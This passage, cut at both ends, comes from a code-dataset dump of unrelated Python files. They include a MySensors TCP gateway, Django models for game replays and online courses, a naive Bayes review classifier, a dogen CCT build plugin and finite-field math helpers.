\"\"\"MySensors TCP gateway.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Set up TCP gateway.\"\"\"\n super().__init__(*args, **kwargs)\n self.protocol = BaseMySensorsProtocol(self, self.start)\n\n def _connect(self):\n \"\"\"Connect to socket. This should be run in a new thread.\"\"\"\n while self.protocol:\n _LOGGER.info('Trying to connect to %s', self.server_address)\n try:\n sock = socket.create_connection(\n self.server_address, self.reconnect_timeout)\n except socket.timeout:\n _LOGGER.error(\n 'Connecting to socket timed out for %s',\n self.server_address)\n _LOGGER.info(\n 'Waiting %s secs before trying to connect again',\n self.reconnect_timeout)\n time.sleep(self.reconnect_timeout)\n except OSError:\n _LOGGER.error(\n 'Failed to connect to socket at %s', self.server_address)\n _LOGGER.info(\n 'Waiting %s secs before trying to connect again',\n self.reconnect_timeout)\n time.sleep(self.reconnect_timeout)\n else:\n self.tcp_check_timer = time.time()\n self.tcp_disconnect_timer = time.time()\n transport = TCPTransport(\n sock, lambda: self.protocol, self._check_connection)\n poll_thread = threading.Thread(target=self._poll_queue)\n self._stop_event.clear()\n poll_thread.start()\n transport.start()\n transport.connect()\n return\n\n def stop(self):\n \"\"\"Stop the gateway.\"\"\"\n _LOGGER.info('Stopping gateway')\n self._disconnect()\n super().stop()\n\n\nclass AsyncTCPGateway(BaseTCPGateway, BaseAsyncGateway):\n \"\"\"MySensors async TCP gateway.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Set up async TCP gateway.\"\"\"\n self.cancel_check_conn = None\n protocol = AsyncTCPMySensorsProtocol\n super().__init__(*args, protocol=protocol, **kwargs)\n\n @asyncio.coroutine\n def _connect(self):\n \"\"\"Connect to the socket.\"\"\"\n try:\n while True:\n _LOGGER.info('Trying to connect to %s', self.server_address)\n try:\n yield from asyncio.wait_for(\n self.loop.create_connection(\n lambda: self.protocol, *self.server_address),\n self.reconnect_timeout, loop=self.loop)\n self.tcp_check_timer = time.time()\n self.tcp_disconnect_timer = time.time()\n self._check_connection()\n return\n except asyncio.TimeoutError:\n _LOGGER.error(\n 'Connecting to socket timed out for %s',\n self.server_address)\n _LOGGER.info(\n 'Waiting %s secs before trying to connect again',\n self.reconnect_timeout)\n yield from asyncio.sleep(\n self.reconnect_timeout, loop=self.loop)\n except OSError:\n _LOGGER.error(\n 'Failed to connect to socket at %s',\n self.server_address)\n _LOGGER.info(\n 'Waiting %s secs before trying to connect again',\n self.reconnect_timeout)\n yield from asyncio.sleep(\n self.reconnect_timeout, loop=self.loop)\n except asyncio.CancelledError:\n _LOGGER.debug(\n 'Connect attempt to %s cancelled', self.server_address)\n\n def _check_connection(self):\n \"\"\"Check if connection is alive every reconnect_timeout seconds.\"\"\"\n try:\n super()._check_connection()\n except OSError as exc:\n _LOGGER.error(exc)\n self.protocol.transport.close()\n self.protocol.conn_lost_callback()\n return\n task = self.loop.call_later(\n self.reconnect_timeout + 0.1, self._check_connection)\n self.cancel_check_conn = task.cancel\n\n @asyncio.coroutine\n def get_gateway_id(self):\n \"\"\"Return a unique id for the gateway.\"\"\"\n mac = yield from self.loop.run_in_executor(\n None, super().get_gateway_id)\n return mac\n\n\nclass AsyncTCPMySensorsProtocol(BaseMySensorsProtocol, asyncio.Protocol):\n \"\"\"Async TCP protocol class.\"\"\"\n\n def connection_lost(self, exc):\n \"\"\"Handle lost connection.\"\"\"\n _LOGGER.debug('Connection lost with %s', self.transport)\n if self.gateway.cancel_check_conn:\n self.gateway.cancel_check_conn()\n self.gateway.cancel_check_conn = None\n if exc:\n _LOGGER.error(exc)\n self.conn_lost_callback()\n self.transport = None\n\n\nclass TCPTransport(serial.threaded.ReaderThread):\n \"\"\"Transport for TCP gateway.\"\"\"\n\n def __init__(self, sock, protocol_factory, check_conn):\n \"\"\"Set up transport.\"\"\"\n super().__init__(sock, protocol_factory)\n self.sock = sock\n # make socket non blocking\n self.sock.setblocking(False)\n self._check_connection = check_conn\n\n def _check_socket(self, timeout=None):\n \"\"\"Check if socket is readable/writable.\"\"\"\n sock = self.sock\n available_socks = select.select([sock], [sock], [sock], timeout)\n if available_socks[2]:\n raise OSError\n return available_socks\n\n def write(self, data):\n \"\"\"Write data to the socket.\"\"\"\n with self._lock:\n self.sock.sendall(data)\n\n def run(self):\n \"\"\"Transport thread loop.\"\"\"\n # pylint: disable=broad-except\n self.protocol = self.protocol_factory()\n try:\n self.protocol.connection_made(self)\n except Exception as exc:\n self.alive = False\n self.protocol.connection_lost(exc)\n self._connection_made.set()\n return\n error = None\n self._connection_made.set()\n while self.alive:\n data = None\n try:\n available_socks = self._check_socket()\n if available_socks[0]:\n data = self.sock.recv(120)\n except Exception as exc:\n error = exc\n break\n else:\n if data:\n try:\n self.protocol.data_received(data)\n except Exception as exc:\n error = exc\n break\n try:\n self._check_connection()\n except OSError as exc:\n error = exc\n break\n time.sleep(0.02) # short sleep to avoid burning 100% cpu\n self.alive = False\n self.protocol.connection_lost(error)\n self.protocol = None\n","sub_path":"mysensors/gateway_tcp.py","file_name":"gateway_tcp.py","file_ext":"py","file_size_in_byte":9366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178535874","text":"from replit import clear\r\n\r\nimport art\r\n\r\nbids = {}\r\n\r\ndef highest_bid(bidding_record):\r\n highest_bid_amount = 0\r\n for bidder in bidding_record:\r\n bidding_amount = bidding_record[bidder]\r\n if bidding_amount > highest_bid_amount:\r\n highest_bid_amount = bidding_amount\r\n winner = bidder\r\n print(f\"The winner is {winner} with a bid of ${highest_bid_amount}\")\r\n \r\nprint(art.logo)\r\n\r\nprint(\"Welcome to the secret auction program!\")\r\n\r\nanother_bidder = True\r\nwhile another_bidder is True:\r\n name = input(\"What is your name?: \")\r\n bid_amount = int(input(\"What's your bid?: $\"))\r\n bids[name] = bid_amount\r\n want_to_add = input(\"Are there any other bidders? Type 'Yes' or 'No' \").lower()\r\n if want_to_add == \"no\":\r\n another_bidder = False\r\n highest_bid(bids)\r\n elif want_to_add == \"yes\":\r\n clear()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"8. Blind Auction/8. Blind Auction.py","file_name":"8. Blind Auction.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"188727147","text":"from django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.utils.safestring import mark_safe\nfrom django.utils.timezone import now\n\nfrom replay_parser import ReplayParser\n\nimport chardet\nfrom datetime import datetime\nimport re\nimport struct\nimport time\n\n\nclass Map(models.Model):\n\n title = models.CharField(\n max_length=100,\n blank=True,\n null=True,\n )\n\n slug = models.CharField(\n max_length=100,\n )\n\n image = models.FileField(\n upload_to='uploads/files',\n blank=True,\n null=True,\n )\n\n def __unicode__(self):\n return self.title or self.slug\n\n class Meta:\n ordering = ['title']\n\n\nclass Replay(models.Model):\n\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n blank=True,\n null=True,\n db_index=True,\n )\n\n title = models.CharField(\n \"replay name\",\n max_length=32,\n blank=True,\n null=True,\n )\n\n file = models.FileField(\n upload_to='uploads/replay_files',\n )\n\n replay_id = models.CharField(\n \"replay ID\",\n max_length=100,\n blank=True,\n null=True,\n )\n\n player_name = models.CharField(\n max_length=100,\n blank=True,\n null=True,\n )\n\n player_team = models.IntegerField(\n default=0,\n blank=True,\n null=True,\n )\n\n map = models.ForeignKey(\n Map,\n blank=True,\n null=True,\n db_index=True,\n )\n\n server_name = models.CharField(\n max_length=100,\n blank=True,\n null=True,\n )\n\n timestamp = models.DateTimeField(\n blank=True,\n null=True,\n )\n\n team_sizes = models.PositiveIntegerField(\n blank=True,\n null=True,\n db_index=True,\n )\n\n team_0_score = models.IntegerField(\n default=0,\n blank=True,\n null=True,\n )\n\n team_1_score = models.IntegerField(\n default=0,\n blank=True,\n null=True,\n )\n\n match_type = models.CharField(\n max_length=7,\n blank=True,\n null=True,\n )\n\n # Parser V2 values.\n keyframe_delay = models.FloatField(\n blank=True,\n null=True,\n )\n\n max_channels = models.IntegerField(\n default=1023,\n blank=True,\n null=True,\n )\n\n max_replay_size_mb = models.IntegerField(\n \"max replay size (MB)\",\n default=10,\n blank=True,\n null=True,\n )\n\n num_frames = models.IntegerField(\n blank=True,\n null=True,\n )\n\n record_fps = models.FloatField(\n \"record FPS\",\n default=30.0,\n blank=True,\n null=True,\n )\n\n excitement_factor = models.FloatField(\n default=0.00,\n )\n\n show_leaderboard = models.BooleanField(\n default=False,\n )\n\n processed = models.BooleanField(\n default=False,\n )\n\n def team_x_player_list(self, team):\n return [\n u\"{}{}\".format(\n player.player_name,\n \" ({})\".format(player.goal_set.count()) if player.goal_set.count() > 0 else '',\n ) for player in self.player_set.filter(\n team=team,\n )\n ]\n\n def team_x_players(self, team):\n return ', '.join(self.team_x_player_list(team))\n\n def team_0_players(self):\n return self.team_x_players(0)\n\n def team_1_players(self):\n return self.team_x_players(1)\n\n def team_0_player_list(self):\n return self.team_x_player_list(0)\n\n def team_1_player_list(self):\n return self.team_x_player_list(1)\n\n def player_pairs(self):\n return map(None, self.team_0_player_list(), self.team_1_player_list())\n\n def region(self):\n if not self.server_name:\n return 'N/A'\n\n match = re.search(settings.SERVER_REGEX, self.server_name).groups()\n return match[1]\n\n def lag_report_url(self):\n base_url = 'https://psyonixhr.wufoo.com/forms/game-server-performance-report'\n if not self.server_name:\n return base_url\n\n # Split out the server name.\n match = re.search(r'(EU|USE|USW|OCE|SAM)(\\d+)(-([A-Z][a-z]+))?', self.server_name).groups()\n\n return \"{}/def/field1={}&field2={}&field13={}\".format(\n base_url,\n *match\n )\n\n def match_length(self):\n if not self.num_frames or not self.record_fps:\n return 'N/A'\n\n calculation = self.num_frames / self.record_fps\n minutes, seconds = divmod(calculation, 60)\n return '%d:%02d' % (\n int(minutes),\n int(seconds),\n )\n\n def calculate_excitement_factor(self):\n # Multiplers for use in factor tweaking.\n swing_rating_multiplier = 8\n goal_count_multiplier = 1.2\n\n # Calculate how the swing changed throughout the game.\n swing = 0\n swing_values = []\n\n for goal in self.goal_set.all():\n if goal.player.team == 0:\n swing -= 1\n else:\n swing += 1\n\n swing_values.append(swing)\n\n if self.team_0_score > self.team_1_score:\n # Team 0 won, but were they ever losing?\n deficit_values = filter(lambda x: x > 0, swing_values)\n\n if deficit_values:\n deficit = max(swing_values)\n else:\n deficit = 0\n\n score_min_def = self.team_0_score - deficit\n else:\n # Team 1 won, but were they ever losing?\n deficit_values = filter(lambda x: x < 0, swing_values)\n\n if deficit_values:\n deficit = abs(min(deficit_values))\n else:\n deficit = 0\n\n score_min_def = self.team_1_score - deficit\n\n if score_min_def != 0:\n swing_rating = float(deficit) / score_min_def * swing_rating_multiplier\n else:\n swing_rating = 0\n\n # Now we have the swing rating, adjust it by the total number of goals.\n # This gives us a \"base value\" for each replay and allows replays with\n # lots of goals but not much swing to get reasonable rating.\n swing_rating += (self.team_0_score + self.team_1_score) * goal_count_multiplier\n\n # Decay the score based on the number of days since the game was played.\n # This should keep the replay list fresh. Cap at a set number of days.\n days_ago = (now().date() - self.timestamp.date()).days\n\n day_cap = 75\n\n if days_ago > day_cap:\n days_ago = day_cap\n\n # Make sure we're not dividing by zero.\n if days_ago > 0:\n days_ago = float(days_ago)\n swing_rating -= swing_rating * days_ago / 100\n\n return swing_rating\n\n def get_absolute_url(self):\n return reverse('replay:detail', kwargs={\n 'pk': self.pk,\n })\n\n class Meta:\n ordering = ['-timestamp', '-pk']\n\n def __str__(self):\n return self.title or str(self.pk) or '[{}] {} {} game on {}. Final score: {}, Uploaded by {}.'.format(\n self.timestamp,\n '{size}v{size}'.format(size=self.team_sizes),\n self.match_type,\n self.map,\n '{}-{}'.format(self.team_0_score, self.team_1_score),\n self.player_name,\n )\n\n def clean(self):\n if self.pk:\n return\n\n if self.file:\n # Process the file.\n parser = ReplayParser()\n\n try:\n replay_data = parser.parse(self.file)['header']\n\n # Check if this replay has already been uploaded.\n replay = Replay.objects.filter(\n replay_id=replay_data['Id']\n )\n\n if replay.count() > 0:\n raise ValidationError(mark_safe(\"This replay has already been uploaded, you can view it here.\".format(\n replay[0].get_absolute_url()\n )))\n except struct.error:\n raise ValidationError(\"The file you selected does not seem to be a valid replay file.\")\n\n def save(self, *args, **kwargs):\n super(Replay, self).save(*args, **kwargs)\n\n # Server name\n\n if self.file and not self.processed:\n # Process the file.\n parser = ReplayParser()\n data = parser.parse(self.file)['header']\n\n Goal.objects.filter(\n replay=self,\n frame__isnull=True,\n ).delete()\n\n Player.objects.filter(\n replay=self,\n ).delete()\n\n # If we have a stats table, pull in the data.\n if 'PlayerStats' in data:\n # We can show a leaderboard!\n self.show_leaderboard = True\n\n for player in data['PlayerStats']:\n \"\"\"\n {\n 'OnlineID': 0,\n 'Name': 'Swabbie',\n 'Saves': 0,\n 'Platform': {\n 'OnlinePlatform': 'OnlinePlatform_Unknown'\n },\n 'Score': 115,\n 'Goals': 1,\n 'Shots': 1,\n 'Team': 1,\n 'bBot': True,\n 'Assists': 0\n }\n \"\"\"\n Player.objects.get_or_create(\n replay=self,\n player_name=player['Name'].decode(chardet.detect(player['Name'])['encoding']),\n platform=player['Platform'].get('OnlinePlatform', ''),\n saves=player['Saves'],\n score=player['Score'],\n goals=player['Goals'],\n shots=player['Shots'],\n team=player['Team'],\n assists=player['Assists'],\n bot=player['bBot'],\n online_id=player['OnlineID'],\n )\n\n for index, goal in enumerate(data['Goals']):\n player, created = Player.objects.get_or_create(\n replay=self,\n player_name=goal['PlayerName'].decode(chardet.detect(goal['PlayerName'])['encoding']),\n team=goal['PlayerTeam'],\n )\n\n Goal.objects.get_or_create(\n replay=self,\n number=index + 1,\n player=player,\n frame=goal['frame'],\n )\n\n data['PlayerName'] = data['PlayerName'].decode(\n chardet.detect(data['PlayerName'])['encoding']\n )\n\n player, created = Player.objects.get_or_create(\n replay=self,\n player_name=data['PlayerName'],\n team=data.get('PrimaryPlayerTeam', 0),\n )\n\n self.replay_id = data['Id']\n self.player_name = data['PlayerName']\n self.player_team = data.get('PrimaryPlayerTeam', 0)\n\n map_obj, created = Map.objects.get_or_create(\n slug=data['MapName'].lower(),\n )\n\n self.map = map_obj\n self.timestamp = datetime.fromtimestamp(\n time.mktime(\n time.strptime(\n data['Date'],\n '%Y-%m-%d:%H-%M'\n )\n )\n )\n self.team_sizes = data['TeamSize']\n self.team_0_score = data.get('Team0Score', 0)\n self.team_1_score = data.get('Team1Score', 0)\n self.match_type = data['MatchType']\n self.server_name = data.get('ServerName', '')\n\n # Parser V2 values\n self.keyframe_delay = data['KeyframeDelay']\n self.max_channels = data['MaxChannels']\n self.max_replay_size_mb = data['MaxReplaySizeMB']\n self.num_frames = data['NumFrames']\n self.record_fps = data['RecordFPS']\n\n self.excitement_factor = self.calculate_excitement_factor()\n self.processed = True\n self.save()\n\n\nclass Player(models.Model):\n\n replay = models.ForeignKey(\n Replay,\n )\n\n player_name = models.CharField(\n max_length=100,\n db_index=True,\n )\n\n team = models.IntegerField()\n\n # 1.06 data\n score = models.PositiveIntegerField(\n default=0,\n blank=True,\n )\n\n goals = models.PositiveIntegerField(\n default=0,\n blank=True,\n )\n\n shots = models.PositiveIntegerField(\n default=0,\n blank=True,\n )\n\n assists = models.PositiveIntegerField(\n default=0,\n blank=True,\n )\n\n saves = models.PositiveIntegerField(\n default=0,\n blank=True,\n )\n\n platform = models.CharField(\n max_length=100,\n blank=True,\n null=True,\n db_index=True,\n )\n\n online_id = models.BigIntegerField(\n blank=True,\n null=True,\n db_index=True,\n )\n\n bot = models.BooleanField(\n default=False,\n )\n\n user_entered = models.BooleanField(\n default=False,\n )\n\n def __unicode__(self):\n return u'{} on Team {}'.format(\n self.player_name,\n self.team,\n )\n\n class Meta:\n ordering = ('team', '-score')\n\n\nclass Goal(models.Model):\n\n replay = models.ForeignKey(\n Replay,\n db_index=True,\n )\n\n # Goal 1, 2, 3 etc..\n number = models.PositiveIntegerField()\n\n player = models.ForeignKey(\n Player,\n db_index=True,\n )\n\n frame = models.IntegerField(\n blank=True,\n null=True,\n )\n\n def goal_time(self):\n if not self.frame or not self.replay.record_fps:\n return 'N/A'\n\n calculation = self.frame / self.replay.record_fps\n minutes, seconds = divmod(calculation, 60)\n return '%d:%02d' % (\n int(minutes),\n int(seconds),\n )\n\n def __unicode__(self):\n return u'Goal {} by {}'.format(\n self.number,\n self.player,\n )\n\n class Meta:\n ordering = ['number']\n\n\nclass ReplayPack(models.Model):\n\n title = models.CharField(\n max_length=50,\n )\n\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n db_index=True,\n )\n\n replays = models.ManyToManyField(\n Replay,\n blank=True,\n )\n\n file = models.FileField(\n upload_to='uploads/replaypack_files',\n blank=True,\n null=True,\n )\n\n date_created = models.DateTimeField(\n auto_now_add=True,\n )\n\n last_updated = models.DateTimeField(\n auto_now=True,\n )\n\n def maps(self):\n maps = set([\n str(replay.map) for replay in self.replays.all()\n ])\n\n return ', '.join(maps)\n\n def goals(self):\n return sum([\n replay.team_0_score + replay.team_1_score\n for replay in self.replays.all()\n ])\n\n def players(self):\n players = set([\n player.player_name\n for replay in self.replays.all()\n for player in replay.player_set.all()\n ])\n\n return players\n\n def total_duration(self):\n calculation = sum([replay.num_frames for replay in self.replays.all()]) / 30\n minutes, seconds = divmod(calculation, 60)\n hours, minutes = divmod(minutes, 60)\n\n return '{} {}m {}s'.format(\n '{}h'.format(hours) if hours > 0 else '',\n int(minutes),\n int(seconds),\n )\n\n def __unicode__(self):\n return self.title\n\n def get_absolute_url(self):\n return reverse('replaypack:detail', kwargs={\n 'pk': self.pk,\n })\n\n class Meta:\n ordering = ['-last_updated', '-date_created']\n","sub_path":"rocket_league/apps/replays/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"232927963","text":"\"\"\"Defines the operator class.\n\nAn operator is a step in a pipeline, that executes a task, given a configuration, stage and data,\nand updates the stage.\nOperators have dependencies (on other operators / on the stage)\n\"\"\"\n\nfrom src.context.meta import MetaContext\nfrom src.services.service_provider import ServiceProviderHandler\nfrom src.services.filesystem.container import Container\nfrom .stages import Stage\n\nSERVICE = ServiceProviderHandler()\n\n\nclass Operator:\n \"\"\"\n An operator is a step in a pipeline, that executes a task, given a configuration, stage\n and data, and updates the stage.\n Operators have dependencies. In our case we choose to define dependencies using a stage,\n rather than pairwise dependencies.\n \"\"\"\n\n def __init__(self, operator_id: str, final_stage: \"Stage\", python_callable: callable):\n \"\"\"Create an Operator.\n\n :param operator_id: ID of the operator\n :param final_stage: stage that the operator triggers on completion\n :param python_callable: function to use to run the Operator.\n The python_callable should take 3 keyword arguments:\n - stage: a Stage object\n - context: a MetaContext object\n And it should return 2 objects:\n - output_context: a MetaContext object\n \"\"\"\n\n self._id = str(operator_id)\n self._python_callable = python_callable\n\n if isinstance(final_stage, str):\n final_stage = Container.get_stage(stage=final_stage)\n self.final_stage = final_stage\n\n def __call__(self, stage: \"Stage\", context: \"MetaContext\", scenario: \"Scenario\"):\n \"\"\"Executes the Operator.\n\n :param stage: a Stage object\n :param context: a MetaContext object or None\n\n Returns:\n :returns output_context: the new context\n \"\"\"\n\n assert isinstance(stage, Stage)\n\n with SERVICE.timer(context=str(context), task=self._id):\n output_context = self._python_callable(\n stage=stage,\n context=context,\n scenario=scenario,\n )\n\n return output_context\n","sub_path":"src/tasks/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"259329274","text":"from collections import Counter\nimport math\n\n\n\nnegtext = open(\"hotelNegT-train.txt\").read()\n\n\npostext = open(\"hotelPosT-train.txt\").read()\n\n\npositivetext = open(\"hotelPosT-train.txt\").readlines()\n\nnegativetext = open(\"hotelNegT-train.txt\").readlines()\n\n\n\n\n\n\nposdocs = len(positivetext)\n\nnegdocs = len(negativetext)\n\ntotaldocs = posdocs + negdocs\n\n\n\nnegwords = negtext.split()\n\nposwords = postext.split()\n\ntotalwords = poswords + negwords\n\n\n\n\n\n#freqs = Counter(words)\n\n#for i in range(0, len(words) - 1):\n \n #if (freqs[words[i]] == 1):\n #words[i] = ''\n\n\nposfreqs = Counter(poswords)\n\nnegfreqs = Counter(negwords)\n\ntotalfreqs = Counter(totalwords)\n\n\n\n\n\n\nposN = sum(posfreqs.values())\n\nnegN = sum(negfreqs.values())\n\nN = sum(totalfreqs.values())\n\n\n\nV = len(totalfreqs)\n\n\n\ndef pick(doc):\n\n\n\tprobPos = 1\n\n\tprobNeg = 1\n\n\tfor i in doc.split():\n\n\t\tprobNeg = probNeg + math.log((negfreqs[i] + 1)/(totalfreqs[i] + V))\n\n\t\tprobPos = probPos + math.log((posfreqs[i] + 1)/(totalfreqs[i] + V))\n\n\n\n\n\n\tprobPos = probPos + math.log((posdocs/totaldocs))\n\n\tprobNeg = probNeg + math.log((negdocs/totaldocs))\n\n\tif(probPos > probNeg):\n\t\treturn True\n\n\telse:\n\t\treturn False\n\n\n\n\n\n\n\n#negativeTest = open(\"hotelNegT-TEST.txt\").readlines()\n\n#positiveTest = open(\"hotelPosT-TEST.txt\").readlines()\n\n\ntestSet = open(\"HW3-testset.txt\").readlines()\n\n\n\n\ne = open(\"ward-ethan-assgn3-out.txt\",\"w+\")\n\n\nfor i in testSet:\n\n\n\tID = i[0:7]\n\n\n\tresult = pick(i)\n\n\tif(result == True):\n\t\tx = \"POS\"\n\telse:\n\t\tx = \"NEG\"\n\n\te.write(ID + ' ' + x + '\\n')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Natural Language/HW3/assign3.py","file_name":"assign3.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231379679","text":"from django.shortcuts import render\nfrom rest_framework import viewsets\nfrom .serializers import CourseSerializer\nfrom course.models import Course\nfrom enrollment.models import Enrollment\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\n\nclass CourseView(viewsets.ModelViewSet):\n serializer_class = CourseSerializer\n queryset = Course.objects.all()\n\n@api_view(['GET',])\ndef course_content_view(request):\n data = {}\n\n if request.user.is_staff or Enrollment.objects.filter(course_id = request.GET['course_id'], student_id = request.user.id).exists():\n if Course.objects.filter(id=request.GET['id']).exists():\n data['video_link'] = Course.objects.get(id=request.GET['id']).video_link\n data['content_html_path'] = Course.objects.get(id=request.GET['id']).content_html_path\n else:\n data['response'] = 'Course not found'\n else:\n data['response'] = 'You must be enrolled in the course to view course content.'\n\n return Response(data)\n\n\n@api_view(['POST',])\ndef enrollment_view(request):\n data = {}\n requested_course = request.GET['course_id']\n if Course.objects.filter(id=requested_course).exists():\n Enrollment.create(Course.objects.get(id=requested_course), request.user)\n data['response'] = 'You are successfully enrolled to the course of ' + requested_course\n else:\n data['response'] = 'Course not found'\n return Response(data)\n\n\n# @api_view(['POST',])\n# def post_course_content_view(request):\n# data = {}\n# if Course.objects.filter(id=request.GET['id']).exists():\n# data['video_link'] = Course.objects.get(id=request.GET['id']).video_link\n# data['content_html_path'] = Course.objects.get(id=request.GET['id']).content_html_path\n# else:\n# data['response'] = 'Course not found'\n#\n# return Response(data)\n","sub_path":"olp_backend/course/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"617703016","text":"import os\nimport yaml\nimport subprocess\nimport shutil\n\nfrom dogen.plugin import Plugin\n\n\nclass CCT(Plugin):\n @staticmethod\n def info():\n return \"cct\", \"Support for configuring images via cct\"\n\n def __init__(self, dogen, args):\n super(CCT, self).__init__(dogen, args)\n\n def extend_schema(self, parent_schema):\n \"\"\"\n Read in a schema definition for our part of the config and hook it\n into the parent schema at the cct: top-level key.\n \"\"\"\n schema_path = os.path.join(self.dogen.pwd, \"schema\", \"cct_schema.yaml\")\n schema = {}\n with open(schema_path, 'r') as fh:\n schema = yaml.safe_load(fh)\n\n parent_schema['map']['cct'] = schema\n\n def prepare(self, cfg):\n \"\"\"\n create cct changes yaml file for image.yaml template decscriptor\n it require cct aware template.jinja file\n \"\"\"\n # check if cct plugin has any steps to perform (prevent it from raising ugly exceptions)\n if not 'cct' in cfg:\n self.log.debug(\"No cct key in image.yaml - nothing to do\")\n return\n\n if os.path.exists(self.output + '/cct/'):\n shutil.rmtree(self.output + '/cct/')\n\n if 'modules' in cfg['cct']:\n self._prepare_modules(cfg)\n\n cfg['cct']['run'] = ['cct.yaml']\n\n cfg_file_dir = os.path.join(self.output, \"cct\")\n if not os.path.exists(cfg_file_dir):\n os.makedirs(cfg_file_dir)\n\n cfg_file = os.path.join(cfg_file_dir, \"cct.yaml\")\n with open(cfg_file, 'w') as f:\n yaml.dump(cfg['cct']['configure'], f)\n\n if 'runtime' in cfg['cct']:\n self.runtime_changes(cfg)\n\n if not 'user' in cfg['cct']:\n cfg['cct']['user'] = 'root'\n\n def _prepare_modules(self, cfg):\n for module in cfg['cct']['modules']:\n name = None\n if 'name' in module:\n name = module['name']\n elif module['path'][-1] == '/':\n name = os.path.basename(module['path'][0:-1])\n elif len(module['path']) > 4 and module['path'][-4:] == \".git\":\n name = os.path.basename(module['path'][0:-4])\n else:\n name = os.path.basename(module['path'])\n descriptor_dir = os.path.dirname(self.descriptor) + '/cct/'\n # check if module exists in cct dir next to do descriptor\n if os.path.exists(descriptor_dir + name):\n # path exists - I'll just copy it\n shutil.copytree(descriptor_dir + name,\n self.output + '/cct/' + name)\n self.log.info(\"Copied cct module %s.\" % name)\n else:\n # clone it to target dir if not exists\n self.clone_repo(module['path'], self.output + '/cct/' + name)\n self.log.info(\"Cloned cct module %s.\" % name)\n try:\n self.append_sources(name, cfg)\n except Exception as ex:\n self.log.info(\"cannot process sources for module %s\" % name)\n self.log.debug(\"exception: %s\" % ex)\n\n def clone_repo(self, url, path):\n try:\n if not os.path.exists(path):\n subprocess.check_call([\"git\", \"clone\", url, path])\n except Exception as ex:\n self.log.error(\"cannot clone repo %s into %s: %s\", url, path, ex)\n\n def append_sources(self, module, cfg):\n \"\"\"\n Extract sources defined within the module, if provided, and merge\n them with Dogen's master sources list.\n \"\"\"\n sources_path = os.path.join(self.output, \"cct\", module, \"sources.yaml\")\n\n if not os.path.exists(sources_path):\n self.log.debug(\"no sources defined for module %s\" % module)\n return\n\n source_prefix = os.getenv(\"DOGEN_CCT_SOURCES_PREFIX\") or \"\"\n if not source_prefix:\n self.log.debug(\"DOGEN_CCT_SOURCES_PREFIX variable is not defined\")\n\n cct_sources = []\n with open(sources_path) as f:\n cct_sources = yaml.load(f)\n\n dogen_sources = []\n for source in cct_sources:\n dogen_source = {}\n dogen_source['url'] = source_prefix + source['name']\n dogen_source['md5sum'] = source['md5sum']\n dogen_sources.append(dogen_source)\n try:\n cfg['sources'].extend(dogen_sources)\n except:\n cfg['sources'] = dogen_sources\n\n def runtime_changes(self, cfg):\n \"\"\"\n Handle configuring CCT for runtime use.\n\n User may supply a /cct/runtime key which will be written out as\n instructions for cct to execute at runtime.\n \"\"\"\n\n # write out a cctruntime.yaml file from the /cct/runtime_changes key\n cfg_file_dir = os.path.join(self.output, \"cct\")\n if not os.path.exists(cfg_file_dir):\n os.makedirs(cfg_file_dir)\n cfg_file = os.path.join(cfg_file_dir, \"cctruntime.yaml\")\n with open(cfg_file, 'w') as f:\n yaml.dump(cfg['cct']['runtime'], f)\n\n # adjust cfg object so template adds the above to ENTRYPOINT\n if not 'runtime_changes' in cfg['cct']:\n cfg['cct']['runtime_changes'] = \"/tmp/cct/cctruntime.yaml\"\n\n","sub_path":"dogen/plugins/cct.py","file_name":"cct.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"426144434","text":"import math\r\nimport copy\r\nimport time\r\nfrom random import *\r\n\r\n\r\n\r\ndef decompose(n):\r\n L = []\r\n cpt = 0\r\n while (n % 2) == 0:\r\n cpt = cpt + 1\r\n n = n // 2\r\n if (cpt != 0):\r\n L += [[2,cpt]]\r\n i = 3\r\n while n != 1:\r\n cpt = 0\r\n while (n % i) == 0:\r\n cpt = cpt + 1\r\n n = n // i\r\n if (cpt != 0):\r\n L += [[i,cpt]]\r\n i = i + 2\r\n return L\r\n\r\n\r\ndef decompose(n):\r\n L=[]\r\n while n!=0:\r\n L = [n & 1] + L\r\n n = n >> 1\r\n return L\r\n\r\n\r\ndef evalue(Q,y,P):\r\n\tval=Q[0]\r\n\tfor i in range(1,len(Q)):\r\n\t\tval = multiplie(val,y,P) ^ Q[i] \r\n\treturn val\r\n\r\n\r\ndef inverse(x,P):\r\n m_ = len(bin(P)) - 3\r\n i = log_table[x]\r\n return alpha_table[((1 << m_)-1)-i]\r\n\r\n\r\ndef table_alpha(P):\r\n m_ = len(bin(P)) - 3\r\n cardinal = (1 << m_)\r\n L = [0]*(cardinal-1)\r\n z = 1\r\n for j in range(0, cardinal-1):\r\n L[j] = z\r\n z = multbyalpha(z,P)\r\n return L\r\n\r\n\r\ndef matmat(A,B):\r\n l=[]\r\n for i in range (len(A)):\r\n tmp = []\r\n for k in range(len(B[0])):\r\n s=0\r\n for j in range(len(A[0])):\r\n 